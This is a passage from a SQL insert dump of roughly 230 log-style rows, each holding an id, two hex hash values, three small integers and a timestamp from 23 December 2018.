(41443, '79b8df5272e7f595b341253782cf4179', '9789fc146e8465f4', 0, 2, 1, '2018-12-23 06:10:29'),
(41444, '51088fdc63e74c77130da429742b8da0', '46713cac27a94b83', 0, 2, 1, '2018-12-23 06:11:10'),
(41445, 'bcb6f45303647417891ae646317a049d', '3a5b76abea3ea51a', 0, 2, 1, '2018-12-23 06:11:24'),
(41446, '3005a4ac0b85361fac263ecf736792ac', 'a02a3c80cccf2b95', 0, 2, 1, '2018-12-23 06:12:23'),
(41447, '3005a4ac0b85361fac263ecf736792ac', 'a02a3c80cccf2b95', 0, 2, 1, '2018-12-23 06:13:53'),
(41448, '3005a4ac0b85361fac263ecf736792ac', 'a02a3c80cccf2b95', 0, 2, 1, '2018-12-23 06:14:27'),
(41449, '6ce1dff27f194740d042d1716df314f8', '51581fd9c284af75', 0, 2, 1, '2018-12-23 06:14:57'),
(41450, 'cdfb48b1a9706b11e24cf11709ceb866', '29608a328df169fa', 0, 2, 1, '2018-12-23 06:15:53'),
(41451, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2018-12-23 06:15:54'),
(41452, 'cdfb48b1a9706b11e24cf11709ceb866', '29608a328df169fa', 0, 2, 1, '2018-12-23 06:16:15'),
(41453, '3005a4ac0b85361fac263ecf736792ac', 'a02a3c80cccf2b95', 0, 2, 1, '2018-12-23 06:16:24'),
(41454, '9b719701d71203e7a2830a49b1ec8d82', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-23 06:17:03'),
(41455, '159014ef2721b738dfc5dafa6cd80a6a', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-23 06:17:43'),
(41456, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 06:18:12'),
(41457, '74989e85b43a4cf90423060d854c6990', 'abc5ec7aefe03208', 0, 2, 1, '2018-12-23 06:19:33'),
(41458, 'b9968a33a2effa77936b7dd257cf9233', '9a903552e28cf43c', 0, 2, 1, '2018-12-23 06:19:57'),
(41459, 'b9968a33a2effa77936b7dd257cf9233', '9a903552e28cf43c', 0, 2, 1, '2018-12-23 06:20:08'),
(41460, '74989e85b43a4cf90423060d854c6990', 'abc5ec7aefe03208', 0, 2, 1, '2018-12-23 06:20:34'),
(41461, '51088fdc63e74c77130da429742b8da0', '46713cac27a94b83', 0, 2, 1, '2018-12-23 06:20:51'),
(41462, '51088fdc63e74c77130da429742b8da0', '46713cac27a94b83', 0, 2, 1, '2018-12-23 06:21:03'),
(41463, '51088fdc63e74c77130da429742b8da0', '46713cac27a94b83', 0, 2, 1, '2018-12-23 06:21:43'),
(41464, 'e8d680b115473696150d7701fdfdb4c8', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-23 06:22:31'),
(41465, '2c67597281153fbaba62cff245a0dcee', '8e815b2f4d02fe94', 0, 2, 1, '2018-12-23 06:23:07'),
(41466, 'a9443cab350b39d2f45fc5a61f88ced7', '5a08da7046298e7a', 0, 2, 1, '2018-12-23 06:24:17'),
(41467, 'b21ce49d82ff351b4af685fd2c10018c', '575b738595cdb2f5', 0, 2, 1, '2018-12-23 06:24:24'),
(41468, '74989e85b43a4cf90423060d854c6990', 'abc5ec7aefe03208', 0, 2, 1, '2018-12-23 06:25:03'),
(41469, '6a3a5457f2e95ce0c8c7890ada28b141', '3bd36d6429a9f245', 0, 2, 1, '2018-12-23 06:25:50'),
(41470, '3975eaa726e6a2766e3f2407664947bf', '6e117bd555667400', 0, 2, 1, '2018-12-23 06:27:13'),
(41471, '33114682c106dc8a8bf3a227af32a341', 'd65f83e2282caa2a', 0, 2, 1, '2018-12-23 06:29:17'),
(41472, 'bdaa67a1299187fcf4e894c0728d12c6', '5f34085ab2e0d65b', 0, 2, 1, '2018-12-23 06:30:15'),
(41473, '8bce1d5fe222855831caf44fed4cd832', '1ea0ff7ee1e4e11d', 0, 2, 1, '2018-12-23 06:30:15'),
(41474, '8bce1d5fe222855831caf44fed4cd832', '1ea0ff7ee1e4e11d', 0, 2, 1, '2018-12-23 06:30:51'),
(41475, '159014ef2721b738dfc5dafa6cd80a6a', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-23 06:30:58'),
(41476, '8bce1d5fe222855831caf44fed4cd832', '1ea0ff7ee1e4e11d', 0, 2, 1, '2018-12-23 06:31:39'),
(41477, '0b92ab88cb9c336735a8864a97e18ed5', '6ec4b4f916b8de26', 0, 2, 1, '2018-12-23 06:31:50'),
(41478, '8bce1d5fe222855831caf44fed4cd832', '1ea0ff7ee1e4e11d', 0, 2, 1, '2018-12-23 06:32:26'),
(41479, 'cdfb48b1a9706b11e24cf11709ceb866', '29608a328df169fa', 0, 2, 1, '2018-12-23 06:32:57'),
(41480, '8bce1d5fe222855831caf44fed4cd832', '1ea0ff7ee1e4e11d', 0, 2, 1, '2018-12-23 06:33:04'),
(41481, '0b92ab88cb9c336735a8864a97e18ed5', '6ec4b4f916b8de26', 0, 2, 1, '2018-12-23 06:33:13'),
(41482, 'bdaa67a1299187fcf4e894c0728d12c6', '5f34085ab2e0d65b', 0, 2, 1, '2018-12-23 06:33:40'),
(41483, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 06:33:51'),
(41484, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 06:33:52'),
(41485, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 06:34:01'),
(41486, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2018-12-23 06:34:02'),
(41487, '2d21d3b33ef38e3c1eb082a76cfb6f38', '3720e464c782ec77', 0, 2, 1, '2018-12-23 06:36:20'),
(41488, 'bdaa67a1299187fcf4e894c0728d12c6', '5f34085ab2e0d65b', 0, 2, 1, '2018-12-23 06:36:25'),
(41489, '2d21d3b33ef38e3c1eb082a76cfb6f38', '3720e464c782ec77', 0, 2, 1, '2018-12-23 06:37:32'),
(41490, '3ad1cb833da0626cbcbfaa5ab5df0934', '7501b42c35accff7', 0, 2, 1, '2018-12-23 06:38:39'),
(41491, 'b21ce49d82ff351b4af685fd2c10018c', '575b738595cdb2f5', 0, 2, 1, '2018-12-23 06:38:50'),
(41492, '414f519a1244b84809953c9da6edfa32', '52aa9e0502f94486', 0, 2, 1, '2018-12-23 06:39:01'),
(41493, 'cc57a8c7828eb4cd9c75c1978688a52f', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-23 06:40:03'),
(41494, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 06:42:38'),
(41495, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 06:42:48'),
(41496, 'e8d680b115473696150d7701fdfdb4c8', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-23 06:46:03'),
(41497, '8d10f0064d2d539ab1226658ca787b3a', '0d6d214e577e9800', 0, 2, 1, '2018-12-23 06:47:29'),
(41498, '46f4afb99a5b1e3bda248cdfe94d7b0a', '45003461ebfe45c2', 0, 2, 1, '2018-12-23 06:47:49'),
(41499, '4e164722af4c715c7ba9257758df1685', '8c0ff6c07aa4b540', 0, 2, 1, '2018-12-23 06:48:07'),
(41500, '46f4afb99a5b1e3bda248cdfe94d7b0a', '45003461ebfe45c2', 0, 2, 1, '2018-12-23 06:48:30'),
(41501, '4e164722af4c715c7ba9257758df1685', '8c0ff6c07aa4b540', 0, 2, 1, '2018-12-23 06:48:35'),
(41502, '414f519a1244b84809953c9da6edfa32', '52aa9e0502f94486', 0, 2, 1, '2018-12-23 06:48:47'),
(41503, '4e164722af4c715c7ba9257758df1685', '8c0ff6c07aa4b540', 0, 2, 1, '2018-12-23 06:49:13'),
(41504, '4e164722af4c715c7ba9257758df1685', '8c0ff6c07aa4b540', 0, 2, 1, '2018-12-23 06:49:54'),
(41505, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 06:50:30'),
(41506, 'bdaa67a1299187fcf4e894c0728d12c6', '5f34085ab2e0d65b', 0, 2, 1, '2018-12-23 06:50:31'),
(41507, '4e164722af4c715c7ba9257758df1685', '8c0ff6c07aa4b540', 0, 2, 1, '2018-12-23 06:50:43'),
(41508, '4e164722af4c715c7ba9257758df1685', '8c0ff6c07aa4b540', 0, 2, 1, '2018-12-23 06:50:51'),
(41509, '4e164722af4c715c7ba9257758df1685', '8c0ff6c07aa4b540', 0, 2, 1, '2018-12-23 06:51:13'),
(41510, '2d21d3b33ef38e3c1eb082a76cfb6f38', '3720e464c782ec77', 0, 2, 1, '2018-12-23 06:51:41'),
(41511, '31624fa5c7d03048f010ed460e88889d', '19435b577b2d68c1', 0, 2, 1, '2018-12-23 06:52:06'),
(41512, 'bdaa67a1299187fcf4e894c0728d12c6', '5f34085ab2e0d65b', 0, 2, 1, '2018-12-23 06:55:28'),
(41513, '3005a4ac0b85361fac263ecf736792ac', 'a02a3c80cccf2b95', 0, 2, 1, '2018-12-23 06:55:39'),
(41514, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 06:56:19'),
(41515, 'd53d4b9cc1b81b00d52747dc6375d549', 'f4310bcd3a0b59ad', 0, 2, 1, '2018-12-23 06:56:32'),
(41516, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 06:56:32'),
(41517, 'aaabc5837c60d7ab2d3d8703982ebc6c', 'a02a3c80cccf2b95', 0, 2, 1, '2018-12-23 06:57:15'),
(41518, '8c3ba2aa5fd84bbc8ca465482779dfed', '74aba437eea39f30', 0, 2, 1, '2018-12-23 06:57:35'),
(41519, '9b473475e9788297eed88922c9dbbd32', '9d7e91466402b84a', 0, 2, 1, '2018-12-23 06:57:45'),
(41520, 'cdfb48b1a9706b11e24cf11709ceb866', '29608a328df169fa', 0, 2, 1, '2018-12-23 06:58:40'),
(41521, '062a0a92fb7f693f0712a73db9ebcfc4', '91d21119de46096c', 0, 2, 1, '2018-12-23 06:59:38'),
(41522, 'bdaa67a1299187fcf4e894c0728d12c6', '5f34085ab2e0d65b', 0, 2, 1, '2018-12-23 06:59:39'),
(41523, '062a0a92fb7f693f0712a73db9ebcfc4', '91d21119de46096c', 0, 2, 1, '2018-12-23 06:59:52'),
(41524, 'd39c9947db8ea06160958a133738631b', 'b5aa5bf58fedb8e0', 0, 2, 1, '2018-12-23 07:00:02'),
(41525, '93da86f0e306d3c95719ff139bda21b5', 'ea9410bf7dd63565', 0, 2, 1, '2018-12-23 07:00:31'),
(41526, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 07:00:39'),
(41527, 'd39c9947db8ea06160958a133738631b', 'b5aa5bf58fedb8e0', 0, 2, 1, '2018-12-23 07:01:05'),
(41528, 'bdaa67a1299187fcf4e894c0728d12c6', '5f34085ab2e0d65b', 0, 2, 1, '2018-12-23 07:01:17'),
(41529, 'f3b1374633785b40e787d68a726d3cd1', '811e11b9896a8cd5', 0, 2, 1, '2018-12-23 07:01:25'),
(41530, 'f3b1374633785b40e787d68a726d3cd1', '811e11b9896a8cd5', 0, 2, 1, '2018-12-23 07:01:44'),
(41531, '314b96d5b14a95636e41dabcc1a584d9', 'd65f83e2282caa2a', 0, 2, 1, '2018-12-23 07:02:06'),
(41532, '314b96d5b14a95636e41dabcc1a584d9', 'd65f83e2282caa2a', 0, 2, 1, '2018-12-23 07:02:31'),
(41533, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 07:03:03'),
(41534, '9b719701d71203e7a2830a49b1ec8d82', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-23 07:03:36'),
(41535, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 07:04:08'),
(41536, 'c1f10db613b5586afe67a144422dee4e', 'ff6a3a87550f88b6', 0, 2, 1, '2018-12-23 07:04:22'),
(41537, 'cdfb48b1a9706b11e24cf11709ceb866', '29608a328df169fa', 0, 2, 1, '2018-12-23 07:04:26'),
(41538, 'bcb6f45303647417891ae646317a049d', '3a5b76abea3ea51a', 0, 2, 1, '2018-12-23 07:04:35'),
(41539, 'f3b1374633785b40e787d68a726d3cd1', '811e11b9896a8cd5', 0, 2, 1, '2018-12-23 07:04:35'),
(41540, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 07:04:55'),
(41541, 'aaabc5837c60d7ab2d3d8703982ebc6c', 'a02a3c80cccf2b95', 0, 2, 1, '2018-12-23 07:05:11'),
(41542, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 07:05:17'),
(41543, '083baad17a2d7e08073fedfd9db64731', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-23 07:05:33'),
(41544, '8c3ba2aa5fd84bbc8ca465482779dfed', '74aba437eea39f30', 0, 2, 1, '2018-12-23 07:05:34'),
(41545, '082a0c626d073290b620069dda4774ff', '51df446c19685386', 0, 2, 1, '2018-12-23 07:05:35'),
(41546, 'aaabc5837c60d7ab2d3d8703982ebc6c', 'a02a3c80cccf2b95', 0, 2, 1, '2018-12-23 07:05:36'),
(41547, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 07:05:50'),
(41548, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 07:05:55'),
(41549, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-23 07:05:56'),
(41550, '6ba1bf1d08d7fea741a5e4a650bb17aa', '196ae7616c94df27', 0, 2, 1, '2018-12-23 07:06:09'),
(41551, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 07:06:15'),
(41552, '8bce1d5fe222855831caf44fed4cd832', '1ea0ff7ee1e4e11d', 0, 2, 1, '2018-12-23 07:06:16'),
(41553, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 07:06:18'),
(41554, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 07:06:26'),
(41555, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2018-12-23 07:06:26'),
(41556, '083baad17a2d7e08073fedfd9db64731', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-23 07:06:27'),
(41557, 'aaabc5837c60d7ab2d3d8703982ebc6c', 'a02a3c80cccf2b95', 0, 2, 1, '2018-12-23 07:06:36'),
(41558, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 07:06:45'),
(41559, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 07:06:51'),
(41560, '8bce1d5fe222855831caf44fed4cd832', '1ea0ff7ee1e4e11d', 0, 2, 1, '2018-12-23 07:06:56'),
(41561, '1dd80c38ddefeb706882f7cab88f7265', '0d8cc63ce25c98b4', 0, 2, 1, '2018-12-23 07:06:58'),
(41562, '1dd80c38ddefeb706882f7cab88f7265', '0d8cc63ce25c98b4', 0, 2, 1, '2018-12-23 07:07:02'),
(41563, 'c6a418f044660f775cf89639d63b572d', 'f52a42a05787db8d', 0, 2, 1, '2018-12-23 07:07:16'),
(41564, '8bce1d5fe222855831caf44fed4cd832', '1ea0ff7ee1e4e11d', 0, 2, 1, '2018-12-23 07:07:20'),
(41565, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 07:07:21'),
(41566, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 07:07:25'),
(41567, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 07:07:39'),
(41568, 'e8d680b115473696150d7701fdfdb4c8', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-23 07:07:40'),
(41569, 'f9819bb9906dfdfea97696b718bd0f1c', '546887b39507976e', 0, 2, 1, '2018-12-23 07:07:46'),
(41570, '8bce1d5fe222855831caf44fed4cd832', '1ea0ff7ee1e4e11d', 0, 2, 1, '2018-12-23 07:07:51'),
(41571, 'aaabc5837c60d7ab2d3d8703982ebc6c', 'a02a3c80cccf2b95', 0, 2, 1, '2018-12-23 07:07:56'),
(41572, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 07:07:59'),
(41573, 'e8d680b115473696150d7701fdfdb4c8', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-23 07:07:59'),
(41574, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 07:08:13'),
(41575, '8bce1d5fe222855831caf44fed4cd832', '1ea0ff7ee1e4e11d', 0, 2, 1, '2018-12-23 07:08:15'),
(41576, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 07:08:22'),
(41577, 'cf6a04063bc17196ab724a9903011201', '91d3688e197526d0', 0, 2, 1, '2018-12-23 07:08:26'),
(41578, 'e8d680b115473696150d7701fdfdb4c8', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-23 07:08:27'),
(41579, '0b68883de9083d3ff75e9ef59a6f4227', '02fd2ff7d9248535', 0, 2, 1, '2018-12-23 07:08:28'),
(41580, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-23 07:08:30'),
(41581, '5a5e93cab4062256abc4d2a8822e84a9', 'a61799839cac7d8c', 0, 2, 1, '2018-12-23 07:08:42'),
(41582, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 07:08:44'),
(41583, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 07:08:46'),
(41584, 'ba25ead8e675d856c95b563977e5d26f', 'a02a3c80cccf2b95', 0, 2, 1, '2018-12-23 07:08:54'),
(41585, '5a5e93cab4062256abc4d2a8822e84a9', 'a61799839cac7d8c', 0, 2, 1, '2018-12-23 07:08:55'),
(41586, 'ba25ead8e675d856c95b563977e5d26f', 'a02a3c80cccf2b95', 0, 2, 1, '2018-12-23 07:09:06'),
(41587, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 07:09:07'),
(41588, '8d10f0064d2d539ab1226658ca787b3a', '0d6d214e577e9800', 0, 2, 1, '2018-12-23 07:09:09'),
(41589, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 07:09:11'),
(41590, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 07:09:19'),
(41591, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 07:09:27'),
(41592, 'f9819bb9906dfdfea97696b718bd0f1c', '546887b39507976e', 0, 2, 1, '2018-12-23 07:09:46'),
(41593, '7b5194df3834f8caa37bea76255519ff', '200f27321b42f4b3', 0, 2, 1, '2018-12-23 07:09:53'),
(41594, 'ba25ead8e675d856c95b563977e5d26f', 'a02a3c80cccf2b95', 0, 2, 1, '2018-12-23 07:10:04'),
(41595, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 07:10:06'),
(41596, '7b5194df3834f8caa37bea76255519ff', '200f27321b42f4b3', 0, 2, 1, '2018-12-23 07:10:24'),
(41597, '9a4b1d8320b8e2ee86d3b8a722760d87', '00cfdd65313a346b', 0, 2, 1, '2018-12-23 07:10:24'),
(41598, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 07:10:30'),
(41599, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 07:10:58'),
(41600, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 07:11:13'),
(41601, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 07:11:31'),
(41602, '9bd68c3976185b4bf53b84a75682433d', '6ca5b1b08e74dcf6', 0, 2, 1, '2018-12-23 07:12:07'),
(41603, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 07:12:11'),
(41604, '8c3ba2aa5fd84bbc8ca465482779dfed', '74aba437eea39f30', 0, 2, 1, '2018-12-23 07:12:13'),
(41605, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 07:12:46'),
(41606, '7b5194df3834f8caa37bea76255519ff', '200f27321b42f4b3', 0, 2, 1, '2018-12-23 07:12:51'),
(41607, '1f25f6c86a7237d0e9bc114058484794', 'ef6156a3302fba73', 0, 2, 1, '2018-12-23 07:13:15'),
(41608, '1f25f6c86a7237d0e9bc114058484794', 'ef6156a3302fba73', 0, 2, 1, '2018-12-23 07:13:22'),
(41609, '46437d009734d1e009e1de40c95ccada', '320bf2e21f88f143', 0, 2, 1, '2018-12-23 07:13:30'),
(41610, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 07:13:45'),
(41611, '1f25f6c86a7237d0e9bc114058484794', 'ef6156a3302fba73', 0, 2, 1, '2018-12-23 07:14:23'),
(41612, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 07:14:30'),
(41613, '72b995487e4649b1ef36451969037d6b', '3bd36d6429a9f245', 0, 2, 1, '2018-12-23 07:15:06'),
(41614, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 07:16:40'),
(41615, '1f25f6c86a7237d0e9bc114058484794', 'ef6156a3302fba73', 0, 2, 1, '2018-12-23 07:16:46'),
(41616, 'aabe4df217585ab8c92dfa34a6ed942c', '9f1d0a97bfbdc5c0', 0, 2, 1, '2018-12-23 07:16:56'),
(41617, '414f519a1244b84809953c9da6edfa32', '52aa9e0502f94486', 0, 2, 1, '2018-12-23 07:17:31'),
(41618, '414f519a1244b84809953c9da6edfa32', '52aa9e0502f94486', 0, 2, 1, '2018-12-23 07:17:34'),
(41619, 'f3ed522cb497783bb1cd87e642c4ddfd', '294db9caeb914d0e', 0, 2, 1, '2018-12-23 07:17:36'),
(41620, '414f519a1244b84809953c9da6edfa32', '52aa9e0502f94486', 0, 2, 1, '2018-12-23 07:17:41'),
(41621, '2779777571e2f3bdd12f9f70b6585b06', '9a5016d6ccef014c', 0, 2, 1, '2018-12-23 07:18:50'),
(41622, 'e9d604ea6afea76246cc6aa276a2dc4a', 'de339124f646affb', 0, 2, 1, '2018-12-23 07:19:46'),
(41623, '9b719701d71203e7a2830a49b1ec8d82', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-23 07:20:08'),
(41624, '451d176ba0308a76417768c66e9f4a42', '34c47e13358cead7', 0, 2, 1, '2018-12-23 07:20:29'),
(41625, '86df76dd452a06629d8dfe59df0d1026', 'd24f777f7eb0b806', 0, 2, 1, '2018-12-23 07:20:39'),
(41626, '451d176ba0308a76417768c66e9f4a42', '34c47e13358cead7', 0, 2, 1, '2018-12-23 07:20:47'),
(41627, 'cdfb48b1a9706b11e24cf11709ceb866', '29608a328df169fa', 0, 2, 1, '2018-12-23 07:21:16'),
(41628, '09388e918afc43431a3aaae281111a38', '9c67046f3d7c037a', 0, 2, 1, '2018-12-23 07:21:18'),
(41629, 'b9538ce3facac5530635fb803b236282', '2b9f3816f683545a', 0, 2, 1, '2018-12-23 07:21:30'),
(41630, 'cdfb48b1a9706b11e24cf11709ceb866', '29608a328df169fa', 0, 2, 1, '2018-12-23 07:21:48'),
(41631, '3873d473e3cf25dbfd576ad671bf26e3', '68d6262f427661c5', 0, 2, 1, '2018-12-23 07:21:52'),
(41632, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-23 07:21:58'),
(41633, '2d21d3b33ef38e3c1eb082a76cfb6f38', '3720e464c782ec77', 0, 2, 1, '2018-12-23 07:22:04'),
(41634, '62d20e5568f21a769d619e08479b6ea5', '6d8223de99afd563', 0, 2, 1, '2018-12-23 07:22:14'),
(41635, '2d21d3b33ef38e3c1eb082a76cfb6f38', '3720e464c782ec77', 0, 2, 1, '2018-12-23 07:22:15'),
(41636, '083baad17a2d7e08073fedfd9db64731', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-23 07:22:43'),
(41637, 'f3b1374633785b40e787d68a726d3cd1', '811e11b9896a8cd5', 0, 2, 1, '2018-12-23 07:22:52'),
(41638, '3873d473e3cf25dbfd576ad671bf26e3', '68d6262f427661c5', 0, 2, 1, '2018-12-23 07:22:54'),
(41639, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 07:23:13'),
(41640, 'a5395eef4d2b9f7bde8fa3c3693f53a9', 'b233d02cbc337d17', 0, 2, 1, '2018-12-23 07:24:06'),
(41641, '9a66a9313a8b8a79b337a9dd9d3101b9', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-12-23 07:24:25'),
(41642, '603cfc0b298bc039cb1176029924ff1c', '0590f2c35fb16469', 0, 2, 1, '2018-12-23 07:24:29'),
(41643, '9b719701d71203e7a2830a49b1ec8d82', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-23 07:24:39'),
(41644, '8c3ba2aa5fd84bbc8ca465482779dfed', '74aba437eea39f30', 0, 2, 1, '2018-12-23 07:25:11'),
(41645, 'dcae95d7acf57b34c99f701b31e8c472', 'c1afa73671a6ae95', 0, 2, 1, '2018-12-23 07:25:56'),
(41646, '9bd3f784a8bfeb0adfa8071fdacd4a81', '46713cac27a94b83', 0, 2, 1, '2018-12-23 07:27:01'),
(41647, '9bd3f784a8bfeb0adfa8071fdacd4a81', '46713cac27a94b83', 0, 2, 1, '2018-12-23 07:27:06'),
(41648, 'cc57a8c7828eb4cd9c75c1978688a52f', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-23 07:27:52'),
(41649, 'cc57a8c7828eb4cd9c75c1978688a52f', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-23 07:28:13'),
(41650, '603cfc0b298bc039cb1176029924ff1c', '0590f2c35fb16469', 0, 2, 1, '2018-12-23 07:28:17'),
(41651, '5b3581610b83dfd75c1f754cf812399b', 'd711c8efa6e768ca', 0, 2, 1, '2018-12-23 07:28:24'),
(41652, '3d3d268f2ec97bfe908fb4130fbafba6', 'a78518b8ca3da8be', 0, 2, 1, '2018-12-23 07:29:24'),
(41653, '82d37016f59bda94ca635c20b341f4a7', '6521fe834dce4d43', 0, 2, 1, '2018-12-23 07:29:50'),
(41654, '82d37016f59bda94ca635c20b341f4a7', '6521fe834dce4d43', 0, 2, 1, '2018-12-23 07:30:49'),
(41655, '9b719701d71203e7a2830a49b1ec8d82', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-23 07:30:51'),
(41656, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-23 07:31:20'),
(41657, '159014ef2721b738dfc5dafa6cd80a6a', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-23 07:31:27'),
(41658, 'ee842d7ce336375cba23d59f1ae0bb18', 'cbceb37e4a508af3', 0, 2, 1, '2018-12-23 07:31:51'),
(41659, 'cdfb48b1a9706b11e24cf11709ceb866', '29608a328df169fa', 0, 2, 1, '2018-12-23 07:31:53'),
(41660, 'cdfb48b1a9706b11e24cf11709ceb866', '29608a328df169fa', 0, 2, 1, '2018-12-23 07:32:15'),
(41661, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-23 07:32:16'),
(41662, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 07:32:17'),
(41663, 'ee842d7ce336375cba23d59f1ae0bb18', 'cbceb37e4a508af3', 0, 2, 1, '2018-12-23 07:32:22'),
(41664, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 07:32:26'),
(41665, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 07:33:05'),
(41666, 'c6a418f044660f775cf89639d63b572d', 'f52a42a05787db8d', 0, 2, 1, '2018-12-23 07:33:10'),
(41667, '466de38780c1f39f3599d055c7eb30f0', '5c88095d7f308e7d', 0, 2, 1, '2018-12-23 07:33:15'),
(41668, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 07:33:20'),
(41669, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 07:33:21'),
(41670, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 07:33:47'),
(41671, '21a262c3664d96d8076cf6c458cbeac6', '0590f2c35fb16469', 0, 2, 1, '2018-12-23 07:34:02'),
(41672, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 07:34:09'),
